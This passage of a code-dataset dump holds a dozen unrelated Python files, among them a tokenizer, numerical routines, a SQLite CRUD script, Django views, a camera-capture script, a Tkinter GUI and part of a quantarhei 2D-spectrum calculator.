re.fullmatch('[a-zа-яё]+', token):\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.fullmatch('.*?\\)+0+[)0]*', token):\n\t\tprocess_token(re.sub('\\)+0+[)0]*$', '', token), tokens)\n\t\ttokens.append('))0')\n\t\treturn True\n\tif re.fullmatch('.*?\\(+9+[(9]*', token):\n\t\tprocess_token(re.sub('\\(+9+[(9]*$', '', token), tokens)\n\t\ttokens.append('((9')\n\t\treturn True\n\tif re.fullmatch('.*?!*1+[!1]+', token):\n\t\tprocess_token(re.sub('!*1+[!1]+$', '', token), tokens)\n\t\ttokens.append('!!11')\n\t\treturn True\n\tif re.fullmatch('.*?([a-zа-яё])1{3,}', token):\n\t\tprocess_token(re.sub('1{3,}$', '', token), tokens)\n\t\ttokens.append('111')\n\t\treturn True\n\tif re.fullmatch('.*?((\\?+)?(!+\\?+)+)', token):\n\t\tprocess_token(re.sub('(\\?+)?(!+\\?+)+$', '', token), tokens)\n\t\ttokens.append('!?')\n\t\treturn True\n\n\tif re.fullmatch('[a-zа-яё0-9]+', token):\n\t\ttokens.append(token)\n\t\treturn True\n\n\tif re.search('-+>+', token):\n\t\tsts = re.split('-+>+', token)\n\t\tfor i, st in enumerate(sts):\n\t\t\tprocess_token(st, tokens)\n\t\t\tif i < len(sts) - 1:\n\t\t\t\ttokens.append('->')\n\t\treturn True\n\n\ttoken = re.sub('-{2,}', '–', token)\n\n\tfor char in ['.', ',', '!', '?', '(', ')', '-', '_', '+']:\n\t\tif re.fullmatch('.*?' + re.escape(char) + '{2,}', token):\n\t\t\tprocess_token(re.sub(re.escape(char) + '{2,}$', '', token), tokens)\n\t\t\ttokens.append(char * 3)\n\t\t\treturn True\n\tfor char in ['.', ',', '!', '?', '(', ')', '-', '_', '+']:\n\t\tif re.fullmatch(re.escape(char) + '{2,}.*?', token):\n\t\t\ttokens.append(char * 3)\n\t\t\treturn process_token(re.sub('^' + re.escape(char) + '{2,}', '', token), tokens)\n\n\tfor char in ['.', ',', '!', '?', ':', ';', '-', '–', '*', '=', '~', '$']:\n\t\tif re.fullmatch('.*?' + re.escape(char), token):\n\t\t\tprocess_token(re.sub(re.escape(char) + '$', '', token), tokens)\n\t\t\ttokens.append(char)\n\t\t\treturn True\n\tfor char in ['.', ',', '!', '?', ':', ';', '-', '–', '*', '=', '~', '$']:\n\t\tif re.fullmatch(re.escape(char) + '.*', token):\n\t\t\ttokens.append(char)\n\t\t\treturn process_token(re.sub('^' + re.escape(char), '', token), tokens)\n\n\tfor char in ['.', ',', '!', '?', ':', ';', '+', '*', '=', '–']:\n\t\tif re.search(re.escape(char), token):\n\t\t\tsts = re.split(re.escape(char), token)\n\t\t\tfor i, st in enumerate(sts):\n\t\t\t\tif process_token(st, tokens) and i < len(sts) - 1:\n\t\t\t\t\ttokens.append(char)\n\t\t\treturn True\n\n\tif re.search('[a-zа-яё$]+/[a-zа-яё]+', token):\n\t\tsts = token.split('/')\n\t\tfor i, st in enumerate(sts):\n\t\t\tif process_token(st, tokens) and i < len(sts) - 1:\n\t\t\t\ttokens.append('/')\n\t\treturn True\n\n\tif re.fullmatch('[(\\[\\]][a-zа-яё0-9].*', token):\n\t\treturn process_token(re.sub('^[(\\[\\]]', '', token), tokens)\n\tif re.fullmatch('.*?[a-zа-яё0-9][)\\[\\]]', token):\n\t\treturn process_token(re.sub('[)\\[\\]]$', '', token), tokens)\n\n\tif re.search('[()]', token):\n\t\tfor st in re.split('[()]', token):\n\t\t\tprocess_token(st, tokens)\n\t\treturn True\n\n\tif re.search('[.,!?;]-', token):\n\t\tsts = re.sub('([a-zа-яё0-9])([.,!?;])-([a-zа-яё0-9])', '\\\\1 \\\\2 - \\\\3', token).split(' ')\n\t\tfor st in sts:\n\t\t\tprocess_token(st, tokens)\n\t\treturn True\n\n\ttokens.append(token)\n\treturn True\n","sub_path":"parse_utils.py","file_name":"parse_utils.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"520330148","text":"import numpy as np\nimport scipy.linalg as sla\n\n\n\n\ndef normaInfinito(v):\n maxv: float\n maxv = v[0]\n for i in range(0, len(v)):\n if abs(v[i]) >= maxv:\n maxv = abs(v[i])\n return maxv\n\n\ndef normalizarVector(v):\n w = [0]*len(v)\n for i in range(0, len(v)):\n w[i] = v[i] / normaInfinito(v)\n return w\n\n\n\ndef maxNoZero(v):\n return max([x for x in v if x !=0])\n\n\n\ndef productoMatrizVector(m, v):\n rows = len(m)\n w = [0]*rows\n suma = 0\n for j in range(rows):\n mi = m[j]\n for i in range(len(v)):\n suma += mi[i]*v[i]\n w[j], suma = suma, 0\n\n return w\n\n\n\n\n\n\ndef metodoPotenciasInverso(A, x, M,):\n y = []\n r = 0\n r0: float\n i: int\n (P, L, U) = sla.lu(A)\n UInversa = sla.inv(U)\n LInversa = sla.inv(L)\n for i in range(0, M):\n\n print(i, \":\")\n print(\"r =\", r)\n print(\"x =\", np.around(x, 5))\n r0 = x[0]\n x = productoMatrizVector(UInversa, productoMatrizVector(LInversa, x))\n r = x[0]/r0\n x = normalizarVector(x)\n\nmetodoPotenciasInverso([[6, 5, -5],\n [2, 6, -2],\n [2, 5, -1]], [3, 7, -13], 12)\n\n\n\n\n\n\n","sub_path":"Problema5/potenciasInverso.py","file_name":"potenciasInverso.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49952420","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win32\\egg\\pyrrd\\meta.py\n# Compiled at: 2014-01-14 03:50:33\ndisplay_name = 'pyrrd-fix'\nlibrary_name = 'pyrrd'\nversion = '0.1.1'\nauthor = 'Duncan McGreggor'\nauthor_email = 'duncan@canonical.com'\nlicense = 'BSD'\nurl = 'http://code.google.com/p/pyrrd/'\ndescription = 'bug fixed for pyrrd'","sub_path":"pycfiles/pyRRG-0.1.2.tar/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"412176912","text":"# import mysql.connector\nimport os\nimport sqlite3\n\n\n\nconn = sqlite3.connect(\"resep.db\")\ncursor = conn.cursor()\n# cur.execute(\"CREATE TABLE IF NOT EXISTS profile(id INTEGER PRIMARY KEY, First TEXT, Surname TEXT)\")\ncursor.execute('''CREATE TABLE IF NOT EXISTS resep (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n namaResep VARCHAR NOT NULL,\n bahan VARCHAR NOT NULL\n )''')\nconn.commit()\n# conn.close()\n\n#\n# db = mysql.connector.connect(\n# host=\"localhost\",\n# user=\"admin\",\n# passwd=\"admin\",\n# database=\"toko_mainan\"\n# )\n\n\ndef insert_data():\n namaResep = input(\"Masukan nama: \")\n bahan = input(\"Masukan alamat: \")\n # cursor = db.cursor()\n cursor.execute(\"INSERT INTO resep (namaResep, bahan) VALUES (?, ?)\",(namaResep, bahan))\n # db.commit()\n print(\"{} data berhasil disimpan\".format(cursor.rowcount))\n\n\ndef show_data():\n # cursor = db.cursor()\n sql = \"SELECT * FROM resep\"\n cursor.execute(sql)\n results = cursor.fetchall()\n \n # if cursor.rowcount < 0:\n # print(\"Tidak ada data\")\n # else:\n for data in results:\n print(\"Nama Resep\")\n print(data[1])\n\n\ndef update_data(db):\n show_data()\n customer_id = input(\"pilih id customer> \")\n name = input(\"Nama baru: \")\n address = input(\"Alamat baru: \")\n\n sql = \"UPDATE customers SET name=%s, address=%s WHERE customer_id=%s\"\n val = (name, address, customer_id)\n cursor.execute(sql, val)\n db.commit()\n print(\"{} data berhasil diubah\".format(cursor.rowcount))\n\n\n# def delete_data(db):\n# cursor = db.cursor()\n# show_data(db)\n# customer_id = input(\"pilih id customer> \")\n# sql = \"DELETE FROM customers WHERE customer_id=%s\"\n# val = (customer_id,)\n# cursor.execute(sql, val)\n# db.commit()\n# print(\"{} data berhasil dihapus\".format(cursor.rowcount))\n#\n#\n# def search_data(db):\n# cursor = db.cursor()\n# keyword = input(\"Kata kunci: \")\n# sql = \"SELECT * FROM customers WHERE name LIKE %s OR address LIKE %s\"\n# val = (\"%{}%\".format(keyword), \"%{}%\".format(keyword))\n# cursor.execute(sql, val)\n# results = cursor.fetchall()\n#\n# if cursor.rowcount < 0:\n# print(\"Tidak ada data\")\n# else:\n# for data in results:\n# print(data)\n#\n\ndef show_menu():\n print(\"=== APLIKASI DATABASE PYTHON ===\")\n print(\"1. Insert Data\")\n print(\"2. Tampilkan Data\")\n print(\"3. Update Data\")\n print(\"4. Hapus Data\")\n print(\"5. Cari Data\")\n print(\"0. Keluar\")\n print(\"------------------\")\n menu = input(\"Pilih menu> \")\n\n #clear screen\n # os.system(\"clear\")\n\n if menu == \"1\":\n insert_data()\n elif menu == \"2\":\n show_data()\n # elif menu == \"3\":\n # update_data()\n # elif menu == \"4\":\n # delete_data()\n # elif menu == \"5\":\n # search_data()\n elif menu == \"0\":\n exit()\n else:\n print(\"Menu salah!\")\n\n\nif __name__ == \"__main__\":\n while(True):\n show_menu()\n","sub_path":"cruds_app.py","file_name":"cruds_app.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"652376408","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse\nfrom django.template import loader\n\nfrom olistconnect.models import *\n\nfrom olistconnect.serializers import * \n\nfrom django.views.generic import ListView\n\nfrom rest_framework.views import *\n\n# Create your views here.\n\ndef index(request):\n\t\n\treturn render(request,'base.html')\n\ndef listChannels(request):\n\n\tchannels = Channel.objects.all()\n\tcontext = {\n\t\t'channels' : channels,\n\t}\n\treturn render(request,\"olistconnect/listChannels.html\",context)\n\ndef listCategories(request, channel_name):\n\n\tchannel = Channel.objects.get(name=channel_name)\n\tchannelCategories = channel.category_set.all()\n\t\n\n\tcontext = {\n\t\t'categories' : channelCategories,\n\t\t'channel' : channel\n\t}\n\treturn render(request,\"olistconnect/listCategories.html\",context)\n\ndef showCategory(request, channel_name, category_detail):\n\n\tcategory = Category.objects.get(slug=category_detail)\n\tchannel = channel_name\n\tidparentCategories = CategoryPath.objects.filter(descendant=category)\n\tparentCategories = []\n\tsubcategories = []\n\tfor path in idparentCategories:\n\t\tparentCategories.append(path.ancestor)\n\tiddescendantCategories = CategoryPath.objects.filter(ancestor=category)\n\tfor path in iddescendantCategories:\n\t\tsubcategories.append(path.descendant)\n\tif (parentCategories[0]==None):\n\t\tparentCategories=None\n\telif ( (subcategories[0].name==category.name) and (len(subcategories)==1) ):\n\t\tsubcategories = None\n\tcontext = {\n\t\t'category': category,\n\t\t'subcategories': subcategories,\n\t\t'parentCategories': parentCategories,\n\t\t'channel': channel\n\t}\n\treturn render(request,\"olistconnect/categoryDetail.html\", context)\n\nclass ListChannels(APIView):\n \"\"\"\n View to list all channels in the system.\n\n \"\"\" \n\n def get(self, request, format=None):\n \"\"\"\n get:\n Return a list of all channels.\n \"\"\"\n channels = Channel.objects.all()\n channelSerialized = channelSerializer(channels,many=True)\n return Response(channelSerialized.data)\n\nclass ListCategories(APIView):\n \"\"\"\n View to list all categories in a Channel.\n\n \"\"\" \n\n def get(self, request, channel_name, format=None):\n \"\"\"\n get:\n Return a list of the Channel Categories.\n \"\"\"\n channel = get_object_or_404(Channel, name=channel_name)\n categories = Category.objects.filter(categoryChannel=channel)\n categorySerialized = categorySerializer(categories,many=True)\n return Response(categorySerialized.data)\n\n \nclass ListParentSubCategories(APIView):\n\n\t\"\"\"\n\tView to list the Parent Categories and Subcategories of a Particular Category\n\n\t\"\"\"\n\n\tdef get(self, request, channel_name, category_slug, format=None):\n\t\t\"\"\"\n Return a list of Parents and Sub Categories of a Category\n \"\"\"\n\t\tchannel = get_object_or_404(Channel, name=channel_name)\n\t\tcategory = get_object_or_404(Category, slug=category_slug, categoryChannel=channel )\n\t\tparentCategories = self.getAncestors(category)\n\t\tsubCategories = self.getDescendants(category)\n\n\n\n\n\n\t\tparentSerialized = categorySerializer(parentCategories,many=True)\n\t\tsubSerialized = categorySerializer(subCategories,many=True)\n\n\t\tcontent = {\n\t\t\t'parents': parentSerialized.data,\n\t\t\t'subcategories': subSerialized.data,\n\t\t}\n\n\t\treturn Response(content)\n\n\tdef getAncestors(self,Category):\n\t\t\"\"\"\n Return a Parents list of a Category\n \"\"\"\n\t\tancestors = []\n\t\tidAncestors = CategoryPath.objects.filter(descendant=Category).exclude(ancestor=Category)\n\t\tfor path in idAncestors:\n\t\t\tancestors.append(path.ancestor)\n\n\t\treturn ancestors\n\n\tdef getDescendants(self,Category):\n\t\t\"\"\"\n Return a Subcategory list of a Category\n \"\"\"\n\t\tdescendants = []\n\t\tidDescendants = CategoryPath.objects.filter(ancestor=Category).exclude(descendant=Category)\n\t\tfor path in idDescendants:\n\t\t\tdescendants.append(path.descendant)\n\n\t\treturn descendants\n\n\n\n\n\n\n\n\n\n","sub_path":"work-at-olist/olistconnect/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"581889570","text":"from django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.core.mail import EmailMessage\n\nfrom .forms import ContactForm\n\n\ndef contact(request):\n contact_form = ContactForm\n\n if request.method == 'POST':\n contact_form = ContactForm(data=request.POST)\n if contact_form.is_valid():\n name = request.POST.get('name', '')\n emial = request.POST.get('email', '')\n content = request.POST.get('content', '')\n # Envaimos el Emial\n email = EmailMessage(\n 'La Caffetiera: Curso, Proyecyo Intermedio',\n 'De {} <{}>\\n\\nEscribio:\\n\\n{}'.format(name, emial, content),\n 'no-contestar@inbox.mailtrap.io',\n ['davidsanchezmotran@gmail.com'],\n reply_to=[emial]\n )\n\n try:\n # Si sale bien\n email.send()\n return redirect(reverse('contact') + '?ok')\n except:\n # si Falla\n return redirect(reverse('contact') + '?fail')\n\n return render(request, 'contact/contact.html', {'form': contact_form})\n","sub_path":"webempresa/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"42635611","text":"from time import sleep\nfrom datetime import datetime\nfrom sh import gphoto2 as gp\nimport signal\nimport os\nimport subprocess\n\nshot_date = datetime.now().strftime(\"%Y-%m-%d\")\nprint(shot_date) # 2019-05-19\n\n\ndef capture_cmd():\n shot_time = datetime.now().strftime(\"%Y-%m-%d\" \"%H:%M:%S\")\n triggerAndDownloadWithName = [\n \"--capture-image-and-download\", \"--filename\", shot_time]\n return triggerAndDownloadWithName\n\n\ndef createSaveFolder(save_location):\n try:\n os.chdir(\"/home/pi/Pictures\")\n print(\"Creating folder to save images: \", save_location)\n os.makedirs(save_location)\n os.chdir(save_location)\n current_directory = os.getcwd()\n print(\"Current Directory: \", current_directory)\n except:\n print(\"failed to create the new directory.\")\n\n\ndef captureImage():\n for x in range(0, 10):\n trigger_cmd = capture_cmd()\n gp(trigger_cmd)\n sleep(3)\n\n\ncreateSaveFolder(shot_date)\ncaptureImage()\n","sub_path":"imageCapture.py","file_name":"imageCapture.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85961061","text":"from py_backup.utils import is_sorted, numbers\n\n\n# class Shell:\n# n = 0\n#\n# @staticmethod\n# def sort(nums):\n# length = len(nums)\n# k = 1\n# while k < length // 3:\n# k = k * 3 + 1\n#\n# while k >= 1:\n# for index in range(k, length): # 这里的步长是 1 不是 k, 这样才能一轮比较后形成 k-th sorted\n# key = nums[index]\n# insert_index = index\n# for inner_index in range(index - k, -1, -k):\n# Shell.n += 1\n# compared_key = nums[inner_index]\n# if key < compared_key:\n# nums[inner_index + k] = compared_key\n# insert_index = inner_index\n# else:\n# break\n# nums[insert_index] = key\n# k = k // 3\n#\n# return nums\n\n\nclass Shell:\n n = 0\n\n @staticmethod\n def sort(nums):\n length = len(nums)\n k = 1\n while k < length // 3:\n k = k * 3 + 1\n\n while k >= 1:\n for outer_index in range(k, length):\n key_index = outer_index\n key = nums[key_index]\n for inner_index in range(outer_index - k, -1, -k):\n compared = nums[inner_index]\n Shell.n += 1\n if key < compared:\n nums[inner_index + k] = compared\n key_index = inner_index\n else:\n break\n nums[key_index] = key\n k = k // 3\n\n return nums\n\nif __name__ == \"__main__\":\n print(numbers)\n\n sorted_numbers = Shell.sort(numbers[:])\n print(sorted_numbers)\n print(is_sorted(numbers, sorted_numbers))\n print(Shell.n)\n","sub_path":"py_backup/sort/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49360186","text":"from tkinter import *\nfrom tkinter import ttk\nfrom main import main\n\nwindow= Tk() #has the property of all stuff in tkinter\n\nwindow.style=ttk.Style()\n\nwindow.title (\"CRC\")\n\nwindow.wm_state('zoomed')\n\nlabel=Label(text='Get Generator input from a text file',font='sans-serif 20 bold'\n ,fg='#666666',pady=30\n)\n\nlabel.pack()\nlabel.grid(column=0, row=0)\nwindow.columnconfigure(0, weight=1)\n\n\n\nbutton=Button (master=window,text='Select File',command=lambda :main(window),bg='#EA5E3D',activebackground='#000000',fg='#FFFFFF',activeforeground='#FFFFFF',font=\"Helvetica 20\",width=30,height=1)\nbutton.grid(column=0,row=1)\n\n\nwindow.mainloop()\n","sub_path":"Code/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642326601","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(\n r'^notifications/(?P.*)$',\n views.NotificationView.as_view(),\n name='notifications'\n ),\n url(\n r'^post_payment/(?P.*)$',\n views.PaymentSuccessView.as_view(),\n name='payment_success',\n ),\n url(\n r'^payment_failed/(?P.*)$',\n views.PaymentFailedView.as_view(),\n name='payment_failure',\n ),\n url(\n r'^payment_pending/(?P.*)$',\n views.PaymentPendingView.as_view(),\n name='payment_pending',\n ),\n]\n","sub_path":"django_mercadopago/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"251335237","text":"from Sql.Connect import create_connection\nfrom Sql.DbPath import path\nfrom Sql.Exec import execSql\n\ndef update(column, val,title):\n conn = create_connection(path())\n val = val.replace('\\'', '\\'\\'')\n sql_insert = \"\"\"UPDATE MOVIES SET \"\"\"+column+\"\"\"='\"\"\"+val+\"\"\"' WHERE TITLE='\"\"\"+title+ \"\"\"';\"\"\"\n\n print(sql_insert)\n\n\n\n if conn is not None:\n\n execSql(conn, sql_insert)\n else:\n print(\"Error! cannot create the database connection.\")\n\n\ndef trim():\n conn = create_connection(path())\n sql_insert = \"\"\"UPDATE MOVIES SET TITLE = trim(TITLE);\"\"\"\n\n if conn is not None:\n\n execSql(conn, sql_insert)\n else:\n print(\"Error! cannot create the database connection.\")\n\n\n\n","sub_path":"Sql/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622656531","text":"code = \"\"\"\n#include \n\nextern \"C\" float add(int a, int b){\n return a + b + M_PI;\n}\n\"\"\"\ntestmodule = {\n \"type\": \"compiled\",\n \"objects\": {\n \"main\": {\n \"code\": code,\n \"language\": \"cpp\",\n },\n },\n \"link_options\" : [\"-lm\"],\n \"public_header\": {\n \"language\": \"c\",\n \"code\": \"float add(int a, int b);\"\n }\n}\n\nfrom seamless.core import context, cell, transformer, macro_mode_on\nwith macro_mode_on():\n ctx = context(toplevel=True)\n ctx.testmodule = cell(\"plain\")\n ctx.testmodule.set(testmodule)\n tf = ctx.tf = transformer({\n \"a\": (\"input\", \"plain\"),\n \"b\": (\"input\", \"plain\"),\n \"testmodule\": (\"input\", \"plain\", \"module\"),\n \"result\": (\"output\", \"plain\"),\n })\n ctx.testmodule.connect(tf.testmodule)\n tf._debug = {\n \"direct_print\" : True\n }\n tf.a.cell().set(2)\n tf.b.cell().set(3)\n tf.code.cell().set(\"\"\"\nfrom .testmodule import lib\nprint(\"ADD\", lib.add(a,b))\nresult = testmodule.lib.add(a,b)\n \"\"\")\n ctx.result = cell(\"plain\")\n ctx.tf.result.connect(ctx.result)\n\nctx.compute()\nprint(ctx.result.value)\n","sub_path":"tests/lowlevel/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"189464758","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy\n\nfrom ..core.time import TimeAxis\nfrom ..builders.aggregates import Aggregate\nfrom ..builders.molecules import Molecule\nfrom ..core.managers import eigenbasis_of\nfrom ..qm.propagators.poppropagator import PopulationPropagator \n\nfrom ..utils import derived_type\n\nimport time\n\nclass DFunction2:\n \"\"\"Descrete two-dimensional function \n \n \"\"\"\n def __init__(self, x=None, y=None, z=None):\n pass\n \n def save(self, filename):\n pass\n \n def load(self, filename):\n pass\n \n def plot(self,**kwargs):\n pass \n\n\nclass TwoDSpectrumBase(DFunction2):\n \"\"\"Basic container for two-dimensional spectrum\n \n \n \"\"\"\n \n def __init__(self):\n super().__init__()\n self.data = None\n self.xaxis = None\n self.yaxis = None\n \n self.reph2D = None\n self.nonr2D = None\n\n\n def set_axis_1(self, axis):\n self.xaxis = axis\n \n def set_axis_3(self, axis):\n self.yaxis = axis\n \n def set_data(self, data, dtype=\"Tot\"):\n if dtype == \"Tot\":\n self.data = data\n \n elif dtype == \"Reph\":\n \n self.reph2D = data\n \n elif dtype == \"Nonr\":\n \n self.nonr2D = data\n \n else:\n \n raise Exception(\"Unknow type of data: \"+dtype)\n \n def save(self, filename):\n super().save(filename)\n \n def load(self, filename):\n super().load(filename)\n \n \nclass TwoDSpectrumContainer(TwoDSpectrumBase):\n \n def __init__(self):\n pass\n \n \n def plot(self, axis=None, part=\"ReTot\"):\n \n if part == \"ReTot\":\n # Real part of the total spectrum\n spect2D = numpy.real(self.reph2D) + numpy.real(self.nonr2D)\n \n else:\n raise Exception(\"Undefined part of the spectrum: \"+part)\n \n \n if axis is not None: \n w1_min = axis[0]\n w1_max = axis[1]\n w3_min = axis[2]\n w3_max = axis[3]\n\n (i1_min, dist) = self.xaxis.locate(w1_min)\n (i1_max, dist) = self.xaxis.locate(w1_max)\n\n (i3_min, dist) = self.yaxis.locate(w3_min)\n (i3_max, dist) = self.yaxis.locate(w3_max) \n \n else:\n i1_min = 0\n i1_max = self.xaxis.length\n i3_min = 0\n i3_max = self.yaxis.length\n \n \n #\n # Plotting with given units on axes\n #\n \n realout = spect2D[i1_min:i1_max,i3_min:i3_max]\n \n Ncontour = 100\n plt.contourf(self.xaxis.data[i1_min:i1_max],\n self.yaxis.data[i3_min:i3_max],\n realout, Ncontour) \n \n \n def devide_by(self, val):\n \"\"\"Devides the total spectrum by a value\n \n \"\"\"\n self.reph2D = self.reph2D/val\n self.nonr2D = self.nonr2D/val\n \n \nclass TwoDSpectrumCalculator:\n \"\"\"Calculator of the 2D spectrum\n \n \n Enables setting up parameters of 2D spectrum calculation for later\n evaluation. The method `calculate` returns TwoDSpectrumContainer\n with a 2D spectrum.\n \n Parameters\n ----------\n \n \n \"\"\"\n\n t1axis = derived_type(\"t1axis\",TimeAxis)\n t2axis = derived_type(\"t2axis\",TimeAxis)\n t3axis = derived_type(\"t3axis\",TimeAxis)\n \n system = derived_type(\"system\",[Molecule,Aggregate])\n \n def __init__(self, t1axis, t2axis, t3axis,\n system=None,\n dynamics=\"secular\",\n relaxation_tensor=None,\n rate_matrix=None,\n effective_hamiltonian=None):\n self.t1axis = t1axis\n self.t2axis = t2axis\n self.t3axis = t3axis\n \n #FIXME: check the compatibility of the axes \n \n if system is not None:\n self.system = system\n \n #FIXME: properties to be protected\n self.dynamics = dynamics\n \n # unprotected properties\n self.data = None\n \n self._relaxation_tensor = None\n self._rate_matrix = None\n self._relaxation_hamiltonian = None\n self._has_relaxation_tensor = False\n if relaxation_tensor is not None:\n self._relaxation_tensor = relaxation_tensor\n self._has_relaxation_tensor = True\n if effective_hamiltonian is not None:\n self._relaxation_hamiltonian = effective_hamiltonian\n if rate_matrix is not None:\n self._rate_matrix = rate_matrix\n self._has_rate_matrix = True\n \n self._have_aceto = False\n \n def _vprint(self, string):\n \"\"\"Prints a string if the self.verbose attribute is True\n \n \"\"\"\n if self.verbose:\n print(string)\n \n def calculate(self, rwa=0.0, verbose=False):\n \"\"\"Returns 2D spectrum\n \n Calculates and returns TwoDSpectrumContainer containing 2D spectrum\n based on the parameters specified in this object.\n \n \n \"\"\"\n self.verbose = verbose\n \n try:\n \n import aceto.nr3td as nr3td \n from aceto.lab_settings import lab_settings\n from aceto.band_system import band_system \n self._have_aceto = True\n \n except:\n #\n # FIXME: There should be an optional warning and a fall back onto\n # quantarhei.implementations.aceto module\n #\n raise Exception(\"Aceto not available\")\n \n from ..implementations.aceto import nr3td\n \n self._have_aceto = False\n \n \n if self._have_aceto:\n \n # calculate 2D spectrum using aceto library\n\n ###############################################################################\n #\n # Create band_system from quantarhei classes\n #\n ###############################################################################\n \n if isinstance(self.system, Aggregate):\n \n pass\n \n else:\n \n raise Exception(\"Molecule 2D not implememted\")\n \n agg = self.system\n \n #\n # hamiltonian and transition dipole moment operators\n #\n H = agg.get_Hamiltonian()\n D = agg.get_TransitionDipoleMoment()\n \n #\n # Construct band_system object\n #\n Nb = 3\n Ns = numpy.zeros(Nb, dtype=numpy.int)\n Ns[0] = 1\n Ns[1] = agg.nmono\n Ns[2] = Ns[1]*(Ns[1]-1)/2\n sys = band_system(Nb, Ns)\n \n \n #\n # Set energies\n #\n en = numpy.zeros(sys.Ne, dtype=numpy.float64)\n #if True:\n with eigenbasis_of(H):\n for i in range(sys.Ne):\n en[i] = H.data[i,i]\n sys.set_energies(en)\n \n #\n # Set transition dipole moments\n #\n dge_wr = D.data[0:Ns[0],Ns[0]:Ns[0]+Ns[1],:]\n def_wr = D.data[Ns[0]:Ns[0]+Ns[1],\n (Ns[0]+Ns[1]):(Ns[0]+Ns[1]+Ns[2]),:]\n \n dge = numpy.zeros((3,Ns[0],Ns[1]), dtype=numpy.float64)\n deff = numpy.zeros((3,Ns[1],Ns[2]), dtype=numpy.float64)\n \n for i in range(3):\n dge[i,:,:] = dge_wr[:,:,i]\n deff[i,:,:] = def_wr[:,:,i]\n sys.set_dipoles(0,1,dge)\n sys.set_dipoles(1,2,deff)\n \n \n #\n # Relaxation rates\n #\n KK = agg.get_RedfieldRateMatrix()\n \n # relaxation rate in single exciton band\n Kr = KK.data[Ns[0]:Ns[0]+Ns[1],Ns[0]:Ns[0]+Ns[1]]*10.0\n #print(1.0/Kr)\n \n sys.init_dephasing_rates()\n sys.set_relaxation_rates(1,Kr)\n \n \n #\n # Lineshape functions\n #\n sbi = agg.get_SystemBathInteraction()\n cfm = sbi.CC\n cfm.create_double_integral()\n \n \n #\n # Transformation matrices\n #\n SS = H.diagonalize()\n SS1 = SS[1:Ns[1]+1,1:Ns[1]+1]\n SS2 = SS[Ns[1]+1:,Ns[1]+1:]\n H.undiagonalize()\n \n sys.set_gofts(cfm._gofts) # line shape functions\n sys.set_sitep(cfm.cpointer) # pointer to sites\n sys.set_transcoef(1,SS1) # matrix of transformation coefficients \n sys.set_transcoef(2,SS2) # matrix of transformation coefficients \n\n #\n # Finding population evolution matrix\n #\n prop = PopulationPropagator(self.t1axis, Kr)\n Uee, Uc0 = prop.get_PropagationMatrix(self.t2axis,\n corrections=True)\n\n\n #\n # define lab settings\n #\n lab = lab_settings(lab_settings.FOUR_WAVE_MIXING)\n X = numpy.array([1.0, 0.0, 0.0], dtype=numpy.float64)\n lab.set_laser_polarizations(X, X, X, X)\n \n #\n # Other parameters\n #\n \n #dt = self.t1axis.step\n t1s = self.t1axis.data \n t3s = self.t3axis.data \n\n Nr1 = self.t1axis.length\n Nr3 = self.t3axis.length\n\n atype = self.t1axis.atype\n self.t1axis.atype = 'complete'\n oa1 = self.t1axis.get_FrequencyAxis() \n oa1.data += rwa\n oa1.start += rwa\n self.t1axis.atype = atype\n \n atype = self.t3axis.atype\n self.t3axis.atype = 'complete'\n oa3 = self.t3axis.get_FrequencyAxis() \n oa3.data += rwa\n oa3.start += rwa\n self.t3axis.atype = atype\n \n tc = 0\n twods = []\n \n teetoos = self.t2axis.data\n for tt2 in teetoos:\n\n #\n # Initialize response storage\n #\n resp_r = numpy.zeros((Nr1, Nr3), \n dtype=numpy.complex128, order='F')\n resp_n = numpy.zeros((Nr1, Nr3), \n dtype=numpy.complex128, order='F')\n\n # FIXME: which on axis we should be looking for it2 ??? \n (it2, err) = self.t1axis.locate(tt2) \n self._vprint(\"t2 = \"+str(tt2)+\"fs (it2 = \"+str(it2)+\")\")\n \n #\n # calcute response\n #\n self._vprint(\"calculating response: \")\n rmin = 0.0001\n t1 = time.time()\n \n self._vprint(\" - ground state bleach\")\n # GSB\n nr3td.nr3_r3g(lab, sys, it2, t1s, t3s, 